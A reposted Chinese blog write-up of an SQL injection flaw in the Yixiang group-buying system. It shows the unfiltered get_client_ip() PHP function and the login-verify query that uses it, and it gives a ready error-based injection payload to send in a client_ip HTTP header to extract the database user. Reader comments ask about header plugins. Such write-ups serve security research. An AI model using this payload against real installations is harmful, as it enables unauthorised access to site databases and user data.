易想团购系统通杀SQL注入漏洞分析及利用

admin
admin
admin
138359
文章
113
评论
2021年4月3日19:22:37评论98 views字数 1875阅读6分15秒阅读模式

刚打开红黑看到基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。

找到get_client_ip()函数: 

  1. // 获取客户端IP地址
  2. function get_client_ip(){
  3.    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
  4.        $ip = getenv("HTTP_CLIENT_IP");
  5.    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
  6.        $ip = getenv("HTTP_X_FORWARDED_FOR");
  7.    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
  8.        $ip = getenv("REMOTE_ADDR");
  9.    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
  10.        $ip = $_SERVER['REMOTE_ADDR'];
  11.    else
  12.        $ip = "unknown";
  13.    return($ip);
  14. }

果然没过滤,看了下很多地方用到这个函数。

比如: 

  1. if($_REQUEST['act'] == 'verify')
  2. {
  3. 	$id = intval($_REQUEST['id']);
  4. 	$user_info  = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."user where id = ".$id);
  5. 	if(!$user_info)
  6. 	{
  7. 		showErr($GLOBALS['lang']['NO_THIS_USER']);
  8. 	}
  9. 	$verify = $_REQUEST['code'];
  10. 	if($user_info['verify'] == $verify)
  11. 	{
  12. 		//成功
  13. 		$_SESSION['user_info'] = $user_info;
  14. 		$GLOBALS['db']->query("update ".DB_PREFIX."user set login_ip = '".get_client_ip()."',login_time= ".get_gmtime().",verify = '',is_effect = 1 where id =".$user_info['id']);
  15. 		$GLOBALS['db']->query("update ".DB_PREFIX."mail_list set is_effect = 1 where mail_address ='".$user_info['email']."'");
  16. 		$GLOBALS['db']->query("update ".DB_PREFIX."mobile_list set is_effect = 1 where mobile ='".$user_info['mobile']."'");
  17. 		showSuccess($GLOBALS['lang']['VERIFY_SUCCESS'],0,APP_ROOT."/");
  18. }

团购系统嘛,其实不用看代码,登陆的这些地方必定会用这个函数。

果断的,登陆的时候在http头里面加了个client_ip,值为127′

看图:

报错注入,很简单吧,

exp:

火狐插件增加client_ip头部,对应值为 

  1.  and (select * from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b)#

这套程序用的thinkphp的框架,回头看看有没有代码执行。

摘自:http://www.freebuf.com/articles/web/8422.html

留言评论(旧系统):

TNT @ 2013-04-10 18:28:57

核总,“火狐插件增加client_ip头部”这个具体怎么加,望指导?是用hackbar加吗?

本站回复:

火狐的某种插件,具体不清楚。

cnLuu2nd @ 2013-04-11 08:45:28

火狐下有个modify headers插件:)

本站回复:

good jb.

文章来源于lcx.cc:易想团购系统通杀SQL注入漏洞分析及利用

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:22:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   易想团购系统通杀SQL注入漏洞分析及利用https://cn-sec.com/archives/321991.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息